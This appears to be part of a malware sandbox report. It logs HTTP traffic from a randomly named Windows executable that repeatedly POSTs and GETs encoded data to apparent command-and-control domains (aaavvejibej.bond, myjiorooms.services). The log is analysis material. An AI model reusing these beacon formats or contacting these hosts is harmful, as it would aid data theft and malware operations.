                                                                                                                                            Data Raw: 35 76 63 3d 2b 47 59 4b 32 58 65 71 48 4b 53 41 73 74 58 6d 36 39 6d 65 56 32 6e 2b 63 46 31 63 7a 73 33 63 74 51 57 58 67 38 58 6b 38 7a 57 2f 70 54 73 36 56 49 6a 33 4c 70 68 69 49 62 53 2f 47 36 6e 35 52 32 4a 4c 41 58 30 54 6b 32 5a 65 4c 4f 6f 78 4b 7a 49 67 75 66 39 62 63 37 72 48 6f 73 6c 37 41 46 6d 78 54 43 38 4a 45 7a 6b 6f 71 71 74 37 44 75 50 6b 55 5a 4f 4d 43 6e 4a 51 76 51 6b 50 48 66 6e 77 34 6b 5a 54 46 35 35 37 65 4e 72 71 56 48 71 74 47 70 31 38 57 36 59 4d 30 66 63 59 71 68 75 6f 46 33 6e 34 36 58 75 52 49 6e 52 6e 45 53 47 62 4f 57 2f 41 49 68 47 4d 65 7a 6a 4f 6d 46 74 46 6d 53 38 30 39 2b 42 45
                                                                                                                                            Data Ascii: 5vc=+GYK2XeqHKSAstXm69meV2n+cF1czs3ctQWXg8Xk8zW/pTs6VIj3LphiIbS/G6n5R2JLAX0Tk2ZeLOoxKzIguf9bc7rHosl7AFmxTC8JEzkoqqt7DuPkUZOMCnJQvQkPHfnw4kZTF557eNrqVHqtGp18W6YM0fcYqhuoF3n46XuRInRnESGbOW/AIhGMezjOmFtFmS809+BE
                                                                                                                                            Oct 10, 2024 12:53:56.709448099 CEST730INHTTP/1.1 400 Bad Request
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:56 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PeblaDsfV5h8%2Bqsr1qOvha0dB5lLPFqkPQSSOKcFgyvSFJPm4RdV7mg1V6NmJKqvZMiRTkKr55%2BIYOkSiHGjeE5VNIqnBpWO9SACFwgP504vcruV6vst0v%2F%2FqLVZiQXQ6Lm5TlLiEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d0611c808028c60-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 37 66 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e6 90 ad e5 bb ba 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e5 87 ba e7 a7 9f 0d 0a e8 b0 b7 e6 ad 8c e8 9c 98 e8 9b 9b e6 b1 a0 e5 a4 96 e9 93 be e7 95 99 e7 97 95 0d 0a e5 87 ba e5 94 ae e9 ab 98 e6 94 b6 e5 bd 95 e5 9f 9f e5 90 8d 0d 0a e5 87 ba e5 94 ae e6 b5 81 e9 87 8f e8 af 8d e5 9f 9f e5 90 8d 0d 0a e5 87 ba e7 a7 9f e5 87 ba e5 94 ae e6 b5 81 e9 87 8f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 7f0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            38192.168.2.661429172.67.181.150805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:53:57.996484041 CEST803OUTPOST /m3ct/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.aaavvejibej.bond
                                                                                                                                            Origin: http://www.aaavvejibej.bond
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.aaavvejibej.bond/m3ct/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 2b 47 59 4b 32 58 65 71 48 4b 53 41 73 49 66 6d 34 61 61 65 65 32 6e 39 46 46 31 63 6f 63 33 59 74 51 61 58 67 39 6a 30 38 67 69 2f 77 78 30 36 55 4a 6a 33 4d 70 68 69 50 72 53 6d 4c 61 6e 6d 52 32 46 31 41 57 49 54 6b 32 64 65 4c 50 59 78 4b 41 51 76 75 50 39 5a 4a 4c 72 46 6d 4d 6c 37 41 46 6d 78 54 44 59 6a 45 7a 38 6f 71 36 39 37 43 4c 37 6c 59 35 4f 50 42 6e 4a 51 35 51 6c 47 48 66 6e 65 34 6d 39 35 46 39 4a 37 65 4e 62 71 55 57 71 75 52 35 31 79 4a 71 5a 6a 30 4e 49 51 75 77 44 37 4c 6b 7a 61 6a 51 69 6f 4e 52 51 39 59 68 47 34 63 47 66 43 49 6a 65 2b 65 54 6a 6b 6b 46 56 46 30 46 77 54 79 4b 6b 6e 4a 74 38 54 78 69 57 32 76 38 42 52 70 66 70 59 31 73 47 6b 78 67 3d 3d
                                                                                                                                            Data Ascii: 5vc=+GYK2XeqHKSAsIfm4aaee2n9FF1coc3YtQaXg9j08gi/wx06UJj3MphiPrSmLanmR2F1AWITk2deLPYxKAQvuP9ZJLrFmMl7AFmxTDYjEz8oq697CL7lY5OPBnJQ5QlGHfne4m95F9J7eNbqUWquR51yJqZj0NIQuwD7LkzajQioNRQ9YhG4cGfCIje+eTjkkFVF0FwTyKknJt8TxiW2v8BRpfpY1sGkxg==
                                                                                                                                            Oct 10, 2024 12:53:59.178477049 CEST732INHTTP/1.1 400 Bad Request
                                                                                                                                            Date: Thu, 10 Oct 2024 10:53:59 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBMU%2FnB5J00fm0vpTpnYX5B%2BNiEp%2Fww%2FEfzxmxD4slcnx28zjWUxg4lalw3WgqHi5rASFqXU1qYBWD0lnYWeYxTWsGzrM9kbmYIoUehXBzah%2FH3SrgU9EXGBRc2DolM2IrWnHG8cFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d0611d7f8511895-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 37 66 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e6 90 ad e5 bb ba 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e5 87 ba e7 a7 9f 0d 0a e8 b0 b7 e6 ad 8c e8 9c 98 e8 9b 9b e6 b1 a0 e5 a4 96 e9 93 be e7 95 99 e7 97 95 0d 0a e5 87 ba e5 94 ae e9 ab 98 e6 94 b6 e5 bd 95 e5 9f 9f e5 90 8d 0d 0a e5 87 ba e5 94 ae e6 b5 81 e9 87 8f e8 af 8d e5 9f 9f e5 90 8d 0d 0a e5 87 ba e7 a7 9f e5 87 ba e5 94 ae e6 b5 81 e9 87 8f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 7f0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            39192.168.2.661430172.67.181.150805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:00.538574934 CEST1816OUTPOST /m3ct/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.aaavvejibej.bond
                                                                                                                                            Origin: http://www.aaavvejibej.bond
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.aaavvejibej.bond/m3ct/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 2b 47 59 4b 32 58 65 71 48 4b 53 41 73 49 66 6d 34 61 61 65 65 32 6e 39 46 46 31 63 6f 63 33 59 74 51 61 58 67 39 6a 30 38 68 61 2f 73 55 6f 36 55 71 37 33 4e 70 68 69 4d 72 53 37 4c 61 6e 72 52 32 74 78 41 57 46 6d 6b 30 56 65 4b 74 67 78 4d 78 51 76 6b 50 39 5a 57 62 72 45 6f 73 6c 75 41 46 32 31 54 43 6f 6a 45 7a 38 6f 71 34 31 37 4c 2b 50 6c 65 35 4f 4d 43 6e 4a 69 76 51 6c 71 48 63 57 6a 34 6d 70 44 46 4d 31 37 65 70 2f 71 58 67 32 75 53 5a 31 77 4b 71 5a 37 30 4e 56 4f 75 77 66 33 4c 6e 76 38 6a 58 71 6f 4d 6e 67 2b 41 52 53 76 4b 6c 37 44 4a 7a 32 36 66 44 58 6a 69 54 5a 31 36 45 55 38 2f 35 34 30 41 72 67 34 38 42 61 37 74 75 70 43 71 61 74 47 34 59 54 4e 70 33 78 51 63 55 51 47 55 61 79 67 76 57 7a 57 41 2f 68 76 33 75 52 70 4a 7a 71 57 46 75 6f 4f 6d 73 47 4e 31 49 58 44 44 50 74 76 33 73 2f 37 4a 43 37 4f 6c 4b 50 73 58 2f 51 45 74 74 2f 4f 67 38 67 39 52 61 6e 6b 4c 51 73 4d 53 30 39 47 31 6b 75 66 4f 34 72 73 79 36 4e 32 2b 63 34 58 4c 35 64 4a 66 77 37 2f 37 37 49 2b 56 4c [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=+GYK2XeqHKSAsIfm4aaee2n9FF1coc3YtQaXg9j08ha/sUo6Uq73NphiMrS7LanrR2txAWFmk0VeKtgxMxQvkP9ZWbrEosluAF21TCojEz8oq417L+Ple5OMCnJivQlqHcWj4mpDFM17ep/qXg2uSZ1wKqZ70NVOuwf3Lnv8jXqoMng+ARSvKl7DJz26fDXjiTZ16EU8/540Arg48Ba7tupCqatG4YTNp3xQcUQGUaygvWzWA/hv3uRpJzqWFuoOmsGN1IXDDPtv3s/7JC7OlKPsX/QEtt/Og8g9RankLQsMS09G1kufO4rsy6N2+c4XL5dJfw7/77I+VLiGS8WN2hdebCy4sicVht8+Tol2fzV3Cdreh3n291ZT3f7FrrcGWHQefUzIflEgUCGOnCCmG0CuSYDp/tkvVQD/URHMX5XjlADrg+E6Zi9bNVHwbSTiLO4xi+H7Yzo0OzwZ7CjXnxPyXsrWEV+q5bBFkrpVzGwpJ/MARQBafTFpCLmo0eg1id7WzjaxYzeTBlDmbfcbSqZW2ArUcP21vAy4+Pu2K/2O9HBFDxUDgEbFvYd3u2itnLFUM1XzGTEseEkJa4jubthJGM/FBvN+GZrqxbtbZV3c7IRsx24hfsqamDvzUH8ijROCg2ms7fIhQ/Pcz14xIr5bKV6SS6NTxkGCUywXl+7aMSSJp0Fp4r1wNPmm5qBN9hf0uDrkiR1C3j5wsvAm0yDmdAqe2XYU4KG3sfKB+eNlExbe7jHVp/PDwmTaYKr7MphjaipKxTirXRgPshkgh0rqtSOJXvVpuxyBqyfJgrc/9NIBv7lrLen23bUZiLzTMPNEnT2cq1OD3B5KJtiYwe/5jLim3r3bko/Y8Sddohoo+4MObQ8wKdcRHIzhxMPJC+I6MslTv0PATmqIjurz29DQAWgOfRU9AYjc0YcmwUhx2EcB0mrpBsVs4EWeUIhykvoXQVU+Bcn24yOQ60mu/ahr0O9Y6B4EV4/wYMB8bn4ZjzTv [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:54:01.612015963 CEST724INHTTP/1.1 400 Bad Request
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:01 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GxqViofFcfOOGNafDMmwrM2Fk7nKMqNbYgKyf3qF7QTfewGc7EHdWDkOxKqu51qvK%2FqXkHHY1Js60sQSrufaZ10DAJrFLB7ywbRFgabgTO20jlaRJrFlIcUuHjozQmaCaYdMJEiGbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d0611e7c9b21a13-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 37 66 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e6 90 ad e5 bb ba 0d 0a e8 9c 98 e8 9b 9b e6 b1 a0 e5 87 ba e7 a7 9f 0d 0a e8 b0 b7 e6 ad 8c e8 9c 98 e8 9b 9b e6 b1 a0 e5 a4 96 e9 93 be e7 95 99 e7 97 95 0d 0a e5 87 ba e5 94 ae e9 ab 98 e6 94 b6 e5 bd 95 e5 9f 9f e5 90 8d 0d 0a e5 87 ba e5 94 ae e6 b5 81 e9 87 8f e8 af 8d e5 9f 9f e5 90 8d 0d 0a e5 87 ba e7 a7 9f e5 87 ba e5 94 ae e6 b5 81 e9 87 8f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 7f0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            40192.168.2.661431172.67.181.150805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:03.085782051 CEST509OUTGET /m3ct/?5vc=zEwq1iaMF/uCsqziz8qMUhXCXmUco/L+vi+T8f7QvA3w3jxbUYr6DIVUG7Wad/XDR1ZvfFtvoxN1EeB5BAcej8YfbKSiuNBAZGSPTmsYajwE5YNxObykffmIIzNg2h0GVq7a1DE=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.aaavvejibej.bond
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:54:04.546139956 CEST829INHTTP/1.1 301 Moved Permanently
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Location: http://www.365seo.cc
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aWtIGm2tRbEj5MN%2FKKlnLfYu2lfj7sVbCWq1P7OtW5Nog2Ojwh8%2B2Qgh0Wou8L1VzQdTy0zdRSvJF7E1O%2B8I6vpd5NpmFdpMOPwMbLhP6vUH7FfF382e2Kim8ShlCXWDN5WKGBXnoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8d0611f7da68426b-EWR
                                                                                                                                            alt-svc: h2=":443"; ma=60
                                                                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            41192.168.2.6614323.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:09.672821999 CEST788OUTPOST /7ts8/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.myjiorooms.services
                                                                                                                                            Origin: http://www.myjiorooms.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.myjiorooms.services/7ts8/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 59 69 33 6e 55 76 50 6a 67 46 62 4b 78 77 4e 2f 34 70 33 45 31 4f 79 43 4f 49 6c 7a 79 50 71 6f 67 45 41 57 6e 55 7a 44 63 4e 41 58 43 75 47 54 4f 57 66 41 54 44 78 68 67 45 47 6b 4b 57 41 38 5a 6b 66 75 37 38 49 2f 6c 4c 36 59 52 46 66 62 5a 34 6d 31 4e 42 75 66 2b 53 65 35 52 50 6d 53 52 31 53 66 34 46 33 38 4c 36 41 33 31 34 4f 56 35 70 33 69 38 46 62 42 4d 4a 61 70 65 50 6a 68 38 43 58 57 50 44 30 4a 42 50 37 68 6d 68 61 33 74 61 4f 43 74 6a 55 58 50 53 78 4f 54 69 33 75 4a 69 35 50 39 73 4d 35 66 35 58 75 2b 58 73 56 76 57 59 41 37 5a 75 50 57 4a 4e 45 66 72 63 4c 74 61 57 73 72 6f 49 39 2f 77 49 53
                                                                                                                                            Data Ascii: 5vc=Yi3nUvPjgFbKxwN/4p3E1OyCOIlzyPqogEAWnUzDcNAXCuGTOWfATDxhgEGkKWA8Zkfu78I/lL6YRFfbZ4m1NBuf+Se5RPmSR1Sf4F38L6A314OV5p3i8FbBMJapePjh8CXWPD0JBP7hmha3taOCtjUXPSxOTi3uJi5P9sM5f5Xu+XsVvWYA7ZuPWJNEfrcLtaWsroI9/wIS


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            42192.168.2.6614333.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:12.323878050 CEST812OUTPOST /7ts8/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.myjiorooms.services
                                                                                                                                            Origin: http://www.myjiorooms.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.myjiorooms.services/7ts8/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 59 69 33 6e 55 76 50 6a 67 46 62 4b 72 52 64 2f 2f 4b 76 45 39 4f 79 46 43 6f 6c 7a 39 76 71 6b 67 45 4d 57 6e 57 66 71 64 2f 55 58 43 50 57 54 4e 58 66 41 55 44 78 68 76 6b 47 6c 4f 57 41 4a 5a 6b 43 4f 37 39 45 2f 6c 4c 2b 59 52 45 76 62 4d 66 4b 79 4d 52 75 64 32 79 65 42 65 76 6d 53 52 31 53 66 34 46 6a 47 4c 36 34 33 32 49 2b 56 34 4e 62 74 31 6c 62 4f 61 5a 61 70 49 2f 6a 74 38 43 58 30 50 43 34 6a 42 4e 7a 68 6d 6b 32 33 73 4f 61 46 34 7a 55 5a 4c 53 77 51 54 6e 53 55 47 78 63 45 7a 74 4d 61 49 34 66 35 32 42 74 50 7a 6c 59 6a 70 4a 4f 4e 57 4c 56 32 66 4c 63 68 76 61 75 73 35 2f 45 61 77 45 74 78 77 55 64 36 68 30 32 67 37 37 78 2b 57 6b 4b 52 52 7a 67 74 4e 67 3d 3d
                                                                                                                                            Data Ascii: 5vc=Yi3nUvPjgFbKrRd//KvE9OyFColz9vqkgEMWnWfqd/UXCPWTNXfAUDxhvkGlOWAJZkCO79E/lL+YREvbMfKyMRud2yeBevmSR1Sf4FjGL6432I+V4Nbt1lbOaZapI/jt8CX0PC4jBNzhmk23sOaF4zUZLSwQTnSUGxcEztMaI4f52BtPzlYjpJONWLV2fLchvaus5/EawEtxwUd6h02g77x+WkKRRzgtNg==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            43192.168.2.6614343.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:14.871934891 CEST1825OUTPOST /7ts8/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.myjiorooms.services
                                                                                                                                            Origin: http://www.myjiorooms.services
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.myjiorooms.services/7ts8/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 59 69 33 6e 55 76 50 6a 67 46 62 4b 72 52 64 2f 2f 4b 76 45 39 4f 79 46 43 6f 6c 7a 39 76 71 6b 67 45 4d 57 6e 57 66 71 64 2f 73 58 43 34 57 54 50 30 33 41 56 44 78 68 69 45 47 65 4f 57 41 51 5a 6b 4b 43 37 39 34 42 6c 4e 69 59 51 6d 33 62 49 61 2b 79 46 52 75 64 30 79 65 36 52 50 6e 49 52 31 43 68 34 46 7a 47 4c 36 34 33 32 4c 6d 56 2f 5a 33 74 7a 6c 62 42 4d 4a 61 74 65 50 69 77 38 43 66 46 50 43 73 5a 42 39 54 68 6d 45 6d 33 76 39 79 46 35 54 55 62 4d 53 77 59 54 6e 57 78 47 78 77 35 7a 74 34 38 49 36 44 35 6d 33 6f 33 67 45 34 34 31 4a 65 4f 47 5a 39 33 48 4f 38 50 31 70 57 70 71 74 35 71 37 31 6c 4d 2b 30 4a 69 68 30 32 73 34 4b 6b 56 5a 53 76 52 66 54 6b 67 65 51 31 38 56 68 4a 54 77 41 7a 4c 39 7a 47 41 6e 62 50 51 52 78 4c 4f 37 42 67 53 39 43 6b 7a 51 62 37 53 35 4a 4c 59 78 56 68 56 65 59 52 32 43 7a 47 78 68 45 4c 7a 64 67 48 55 56 46 6f 67 49 51 64 69 6d 71 5a 32 37 72 70 37 55 58 53 6d 33 4d 4d 6e 4b 46 4c 6a 74 52 70 51 51 54 79 41 69 6e 4c 4a 64 2f 42 47 33 48 36 49 37 4d [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=Yi3nUvPjgFbKrRd//KvE9OyFColz9vqkgEMWnWfqd/sXC4WTP03AVDxhiEGeOWAQZkKC794BlNiYQm3bIa+yFRud0ye6RPnIR1Ch4FzGL6432LmV/Z3tzlbBMJatePiw8CfFPCsZB9ThmEm3v9yF5TUbMSwYTnWxGxw5zt48I6D5m3o3gE441JeOGZ93HO8P1pWpqt5q71lM+0Jih02s4KkVZSvRfTkgeQ18VhJTwAzL9zGAnbPQRxLO7BgS9CkzQb7S5JLYxVhVeYR2CzGxhELzdgHUVFogIQdimqZ27rp7UXSm3MMnKFLjtRpQQTyAinLJd/BG3H6I7M9YxxUlHSI/BR3tcXlCQ1WPKfFm6gynCinpjjI3n1PdjyRnP2ZePIY9urp/EcYafhTqZCkHIE5Wc4j8OwojGQGPh40mupDp4Vn9XNF/XqcGISLSjPnlXVd/WFv8Ak0LpgG9G/tAYv1J9gamczg4+hfJuAJCTFwylAUl5NCZ65ToKWcBPSf94Ir521Rg0WIu7QwEuAJ3wUdS7iDjSTc3W39cjRGxHEME8PwRmHO9MXMv6kOIiqrOOTDuiNPvIb5dF/agtU8b5RW7mAMOZ+oP4TqeehB3PutFGNLhaJ0QNzGBvf3mI2aVX399J9wXA5W+07wW8WY+YgtfjzzI1bKEa7cYMiH531XZN2lOrKmGikZ6eQXBAeznKUpR/XhQyJNZ7MeHbusTD0BocdjeXg1LoM1sOPe3D5xCS7t5cfX1PhXACfCrVu4zjUM8FPFMJGur1bWUwaSNLZDNaj7Nf8x85XFisDCrxcmvjbmg8ieb7E7ISNVmfzKMB45K/CRwThsBsajrz7QJ0+T2h5kZelcyLV6axj27N9YRg5t1H0E1eQXbqyscXrVOkHHSD62uBBVw9nswjWkXP+QG5QTy2mUx7ffz4O8/n7wNevCY0QFfuGSelUW8WfqwtfBhzokjSSu+QNu/sXiw4jDKoLL1ajSCkMjjysh4QEx6gGRh [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            44192.168.2.6614353.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:17.516031027 CEST512OUTGET /7ts8/?lLYL=kvUX&5vc=VgfHXYqklmOf3gIY6JX4+MSwLZFx3fC4t3URmGvQc8lOLOm3On7tbGBltUCUb2EMakaNsP50tNqrd0nnNZuXCCSXzQ7vSeHOGGO1wR7Laf4A+YuB3YDb13HLVs/KWc3twln2EFc= HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.myjiorooms.services
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:54:17.970256090 CEST405INHTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:17 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 265
                                                                                                                                            Connection: close
